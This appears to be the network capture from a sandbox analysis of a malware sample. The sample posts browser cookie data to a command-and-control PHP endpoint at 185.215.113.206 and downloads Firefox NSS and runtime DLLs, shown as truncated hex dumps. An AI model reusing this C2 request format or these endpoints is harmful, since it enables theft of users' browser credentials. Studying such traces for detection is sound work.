Nov 12, 2024 00:06:06.046588898 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:05 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Nov 12, 2024 00:06:06.046603918 CET	212	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49728	185.215.113.206	80	3724	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:06:13.849174976 CET	202	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHI Host: 185.215.113.206 Content-Length: 999 Connection: Keep-Alive Cache-Control: no-cache
Nov 12, 2024 00:06:13.849184990 CET	999	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 Data Ascii: ------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb
Nov 12, 2024 00:06:15.096898079 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 12, 2024 00:06:15.221354008 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDB Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="file"------BGIDBKKKKKFBGDGDHIDB--
Nov 12, 2024 00:06:15.930820942 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49758	185.215.113.206	80	3724	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:06:22.082802057 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJKFHIIEHIEGDHJJJKFI Host: 185.215.113.206 Content-Length: 3087 Connection: Keep-Alive Cache-Control: no-cache
Nov 12, 2024 00:06:22.082854986 CET	3087	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 Data Ascii: ------IJKFHIIEHIEGDHJJJKFIContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------IJKFHIIEHIEGDHJJJKFIContent-Disposition: form-data; name="file_name"Y29va2llc1xNa
Nov 12, 2024 00:06:23.219043970 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 12, 2024 00:06:24.075737953 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBKKKJJJKKEBGDAFID Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="file"------CFCBKKKJJJKKEBGDAFID--
Nov 12, 2024 00:06:24.766616106 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 12, 2024 00:06:25.582297087 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 12, 2024 00:06:25.781651020 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:25 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Nov 12, 2024 00:06:25.781666040 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
Nov 12, 2024 00:06:25.781677961 CET	1236	IN	Data Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh\|$,}uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$
Nov 12, 2024 00:06:25.781745911 CET	1236	IN	Data Raw: 55 89 e5 53 57 56 83 ec 24 8b 4d 1c 8b 75 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 7d 08 8d 59 f8 83 f9 10 75 32 8d 45 dc 8d 4d e0 6a 10 ff 75 18 6a 10 50 51 57 e8 f7 93 06 00 83 c4 18 89 c7 8d 75 e8 83 45 dc f8 c7 45 d8 00 00 00 00 85 ff 0f 85 b4 01 Data Ascii: USWV$Mu01E}Yu2EMjujPQWuEEC1;]vS{EE1uuSPVEPo9]SUYY)ZYEME]M)19D
Nov 12, 2024 00:06:25.781764984 CET	1236	IN	Data Raw: 00 00 00 0f 57 c8 0f 11 8c 0e 9c 00 00 00 83 c1 20 83 c3 fe 75 a6 eb 02 31 c9 f6 c2 01 74 28 0f 10 04 0f 0f 10 4c 0e 0c 0f 57 c8 0f 10 84 0e 8c 00 00 00 0f 11 4c 0e 0c 0f 10 0c 0f 0f 57 c8 0f 11 8c 0e 8c 00 00 00 31 db 8b 55 ac 39 c2 74 6b f6 c2 Data Ascii: W u1t(LWLW1U9tkt0T0U19t<f.0L0L0LL09uM17L^_[]USWVh1
Nov 12, 2024 00:06:25.781778097 CET	760	IN	Data Raw: f0 8d 86 00 ff ff ff 3d 00 ff ff ff 77 0a 68 0e e0 ff ff e9 d0 00 00 00 8b 45 08 85 c0 0f 84 c0 00 00 00 8d 9d f0 fe ff ff 68 00 01 00 00 68 20 21 08 10 50 e8 28 f9 07 00 83 c4 0c bf 00 01 00 00 0f 1f 80 00 00 00 00 56 ff 75 0c 53 e8 0f f9 07 00 Data Ascii: =whEhh !P(VuS)9wWuSufDT>\>=t%>>f1h
Nov 12, 2024 00:06:25.781795025 CET	1236	IN	Data Raw: 8a b0 01 01 00 00 83 7d 14 07 0f 87 81 01 00 00 83 7d 14 00 0f 84 61 01 00 00 89 c8 04 01 89 4d ec 0f b6 c8 89 fb 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 37 88 24 0f 88 14 37 8b 75 14 00 d4 0f b6 cc 8a 13 32 14 0f 8b 4d e4 88 11 83 fe 01 0f 84 24 Data Ascii: }}aM}$7$7u2M$E}$7$7u]S2MQE}$7$7u]S2MQE}$7$7u]
Nov 12, 2024 00:06:25.781807899 CET	1236	IN	Data Raw: 83 c1 fe 0f 85 a3 fe ff ff eb 7e 73 1b 8b 07 83 c7 04 8b 4d c4 d3 e8 89 45 e0 8b 4d ec 8b 45 d0 8a 55 e8 e9 78 01 00 00 c7 45 e0 00 00 00 00 8a 55 e8 8b 4d ec e9 66 01 00 00 c7 45 e0 00 00 00 00 8b 4d ec 8a 55 e8 e9 54 01 00 00 0f b6 46 01 c1 e0 Data Ascii: ~sMEMEUxEUMfEMUTFtFMUEM)ffo 1ffo fuEfn,0fnd0ff`faf`fafrfo5 f[fpffpfpffp
Nov 12, 2024 00:06:25.781819105 CET	1236	IN	Data Raw: e8 8b 7d dc 89 14 0f 8b 7d e4 83 c6 fc 83 c1 04 89 c2 8b 45 d0 89 75 d8 3b 75 c8 0f 83 c7 fe ff ff 8b 55 ec 01 ca 01 cf 01 4d dc 83 7d d8 00 0f 85 c4 fc ff ff 8b 45 f0 88 90 00 01 00 00 88 98 01 01 00 00 e9 74 fe ff ff 89 f8 89 cf 83 7d d8 00 0f Data Ascii: }}Eu;uUM}Et}EPEE},7,7E@2CM.USWV\2tRAA
Nov 12, 2024 00:06:25.781831980 CET	1236	IN	Data Raw: 85 5c ff ff ff 8b 85 74 ff ff ff 8b 48 40 89 8d 18 ff ff ff 8b 75 b4 01 ce 8b 48 44 89 8d 34 ff ff ff 8b 55 c8 11 ca 8b bd 60 ff ff ff 01 fe 89 75 b4 13 55 98 31 d3 89 5d 94 89 d3 8b 85 64 ff ff ff 31 f0 89 85 64 ff ff ff 8b 4d ec 03 4d 94 89 4d Data Ascii: \tH@uHD4U`uU1]d1dMMMUU1u1tpH8}pLE]d1]1U]uuEE11E}tBP`MBT
Nov 12, 2024 00:06:26.562661886 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 12, 2024 00:06:26.762329102 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:26 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Nov 12, 2024 00:06:27.024578094 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 12, 2024 00:06:27.224369049 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:27 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Nov 12, 2024 00:06:27.355298996 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 12, 2024 00:06:27.554506063 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:27 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Nov 12, 2024 00:06:28.160792112 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 12, 2024 00:06:28.360234022 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:28 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Nov 12, 2024 00:06:28.437757015 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 12, 2024 00:06:28.641304016 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:28 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Nov 12, 2024 00:06:29.942435026 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGID Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Nov 12, 2024 00:06:30.639209032 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
